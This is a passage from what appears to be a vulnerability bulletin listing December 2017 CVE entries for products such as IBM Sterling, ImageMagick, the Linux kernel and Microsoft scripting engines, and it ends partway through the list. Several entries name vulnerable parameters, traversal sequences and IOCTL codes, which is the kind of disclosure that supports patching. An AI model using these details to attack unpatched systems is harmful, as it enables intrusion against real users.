IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.2017-12-13not yet calculatedCVE-2017-1558
CONFIRM
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow an authenticated user to change other user's passwords. IBM X-Force ID: 131290.2017-12-11not yet calculatedCVE-2017-1550
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289.2017-12-11not yet calculatedCVE-2017-1549
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288.2017-12-11not yet calculatedCVE-2017-1548
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133178.2017-12-11not yet calculatedCVE-2017-1632
CONFIRM
BID
MISC
ibm -- support_tools_for_lotus_wcm
 
IBM Support Tools for Lotus WCM (IBM WebSphere Portal 7.0, 8.0, 8.5 and 9.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130733.2017-12-11not yet calculatedCVE-2017-1536
CONFIRM
BID
MISC
ibm -- tivoli_monitoring
 
IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.2017-12-13not yet calculatedCVE-2017-1635
CONFIRM
BID
MISC
ibm -- tivoli_workload_scheduler
 
IBM Tivoli Workload Scheduler 8.6.0, 9.1.0, and 9.2.0 could disclose sensitive information to a local attacker due to improper permission settings. IBM X-Force ID: 134638.2017-12-13not yet calculatedCVE-2017-1716
CONFIRM
BID
MISC
ibm -- websphere_mq
 
IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow a local user to crash the queue manager agent thread and expose some sensitive information. IBM X-Force ID: 126454.2017-12-11not yet calculatedCVE-2017-1760
CONFIRM
MISC
icu -- international_components_for_unicode_for_c/c++
 
The ucnv_UTF8FromUTF8 function in ucnv_u8.cpp in International Components for Unicode (ICU) for C/C++ through 60.1 mishandles ucnv_convertEx calls for UTF-8 to UTF-8 conversion, which allows remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted string, as demonstrated by ZNC.2017-12-10not yet calculatedCVE-2017-17484
MISC
MISC
MISC
MISC
MISC
MISC
idevicerestore -- idevicerestore
 
The socket_create function in socket.c in idevicerestore through 2017-12-10 allows remote attackers to bypass intended access restrictions and communicate with services on iOS devices by connecting to an IPv4 TCP socket, a similar issue to CVE-2016-5104.2017-12-10not yet calculatedCVE-2017-17496
MISC
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a large loop vulnerability was found in the function ExtractPostscript in coders/wpg.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted wpg image file that triggers a ReadWPGImage call.2017-12-14not yet calculatedCVE-2017-17682
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 7.0.7-12 has a coders/png.c Magick_png_read_raw_profile heap-based buffer over-read via a crafted file, related to ReadOneMNGImage.2017-12-10not yet calculatedCVE-2017-17504
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted xpm image file.2017-12-14not yet calculatedCVE-2017-17680
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, an infinite loop vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted psd image file.2017-12-14not yet calculatedCVE-2017-17681
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 6.9.9-24 and 7.x before 7.0.7-12 has a use-after-free in Magick::Image::read in Magick++/lib/Image.cpp.2017-12-10not yet calculatedCVE-2017-17499
BID
CONFIRM
CONFIRM
CONFIRM
intel -- graphics_driver
 
Type Confusion in Content Protection HECI Service in Intel Graphics Driver allows unprivileged user to elevate privileges via local access.2017-12-12not yet calculatedCVE-2017-5717
CONFIRM
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17700
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17701
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17699
MISC
kaspersky -- embedded_systems_security
 
Kernel pool memory corruption in one of drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.2017-12-08not yet calculatedCVE-2017-12823
BID
CONFIRM
kildclient -- kildclient
 
KildClient 3.1.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to prefs.c and worldgui.c.2017-12-14not yet calculatedCVE-2017-17511
MISC
kiwi -- kiwi
 
examples/framework/news/news3.py in Kiwi 1.9.22 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17532
MISC
landesk -- management_suite
 
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted Direct Object Reference leads to referencing/updating objects belonging to other users. In other words, a normal user can send requests to a specific URI with the target user's username in an HTTP payload in order to retrieve a key/token and use it to access/update objects belonging to other users. Such objects could be user profiles, tickets, incidents, etc.2017-12-11not yet calculatedCVE-2017-11463
MISC
legion_of_the_bouncy_castle -- bouncycastle_tls
 
BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13098
CERT-VN
BID
CONFIRM
MISC
lib/ecstatic.js -- lib/ecstatic.js
 
A regular expression Denial of Service (DoS) vulnerability in the file lib/ecstatic.js of the ecstatic npm package, before version 2.0.0, allows a remote attacker to overload and crash a server by passing a maliciously crafted string.2017-12-14not yet calculatedCVE-2016-10703
MISC
MISC
lilypond -- lilypond
 
lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17523
MISC
MISC
MISC
linux -- kernel
 
The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.2017-12-12not yet calculatedCVE-2017-17558
MISC
MISC
linux -- kernel
 
The raw_sendmsg() function in net/ipv4/raw.c in the Linux kernel through 4.14.6 has a race condition in inet->hdrincl that leads to uninitialized stack pointer usage; this allows a local user to execute code and gain privileges.2017-12-15not yet calculatedCVE-2017-17712
CONFIRM
CONFIRM
linux -- kernel
 
The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.2017-12-11not yet calculatedCVE-2017-1000407
MLIST
BID
CONFIRM
MLIST
maplesoft -- maple_t.a.
 
A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
mathias_kettner -- check_mk
 
A cross site scripting (XSS) vulnerability exists in Check_MK versions 1.2.8x prior to 1.2.8p25 and 1.4.0x prior to 1.4.0p9, allowing an unauthenticated attacker to inject arbitrary HTML or JavaScript via the output_format parameter, and the username parameter of failed HTTP basic authentication attempts, which is returned unencoded in an internal server error page.2017-12-11not yet calculatedCVE-2017-11507
CONFIRM
MISC
mckesson_medical_imaging_company -- conserus_image_repository_archive_solution
 
A security researcher found an XML External Entity (XXE) vulnerability on the Conserus Image Repository archive solution version 2.1.1.105 by McKesson Medical Imaging Company, which is now a Change Healthcare company. An unauthenticated user supplying a modified HTTP SOAP request to the vulnerable service allows for arbitrary file read access to the local file system as well as the transmittal of the application service's account hashed credentials to a remote attacker.2017-12-15not yet calculatedCVE-2017-14101
MISC
mckesson_medical_imaging_company -- conserus_workflow_intelligence_application
 
Security researchers discovered an authentication bypass vulnerability in version 2.0.2 of the Conserus Workflow Intelligence application by McKesson Medical Imaging Company, which is now a Change Healthcare company. The attacker must send a malicious HTTP GET request to exploit the vulnerability. The vulnerability allows an attacker to bypass authentication and escalate privileges of valid users. An unauthenticated attacker can exploit the vulnerability and be granted limited access to other accounts. An authenticated attacker can exploit the vulnerability and be granted access reserved for higher privilege users.2017-12-15not yet calculatedCVE-2017-16776
MISC
meinberg -- lantime_devicesDirectory traversal vulnerability in the "Upload Groupkey" functionality in the Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with Admin-User access to write to arbitrary files and consequently gain root privileges by uploading a file, as demonstrated by storing a file in the cron.d directory.2017-12-15not yet calculatedCVE-2017-16788
FULLDISC
meinberg -- lantime_devices
 
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
FULLDISC
mensis -- mensis
 
uiutil.c in Mensis 0.0.080507 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17521.2017-12-14not yet calculatedCVE-2017-17534
MISC
metview -- metview
 
etc/ObjectList in Metview 4.7.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17515
MISC
micro_focus -- project_and_portfolio_management_center
 
Man-In-The-Middle vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Man-in-the-middle attack.2017-12-12not yet calculatedCVE-2017-14361
CONFIRM
micro_focus -- project_and_portfolio_management_center
 
Cross-Site Request Forgery vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Cross-Site Forgery attack.2017-12-12not yet calculatedCVE-2017-14362
CONFIRM
microsoft -- chakracore
 
ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11916
BID
CONFIRM

microsoft -- device_guard

Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka "Microsoft Windows Security Feature Bypass Vulnerability".2017-12-12not yet calculatedCVE-2017-11899
BID
SECTRACK
CONFIRM
microsoft -- exchance_server
 
Microsoft Exchange Server 2016 CU5 and Microsoft Exchange Server 2016 CU5 allow a spoofing vulnerability due to the way Outlook Web Access (OWA) validates web requests, aka "Microsoft Exchange Spoofing Vulnerability".2017-12-12not yet calculatedCVE-2017-11932
BID
SECTRACK
CONFIRM

microsoft -- internet_explorer

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handle objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11887
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11901
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11903
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11913
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11907
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11906
BID
SECTRACK
CONFIRM
microsoft -- malware_protection_engine
 
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, 1709 and Windows Server 2016, Windows Server, version 1709, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different than CVE-2017-11937.2017-12-08not yet calculatedCVE-2017-11940
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability".2017-12-12not yet calculatedCVE-2017-11888
BID
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11912
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11893
BID
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11918
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and and Internet Explorer adn Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11894
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11895
BID
SECTRACK
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11911
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11890
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11889
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11909
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11910
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11908
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11914
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.2017-12-12not yet calculatedCVE-2017-11930
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11905
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.2017-12-12not yet calculatedCVE-2017-11919
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 
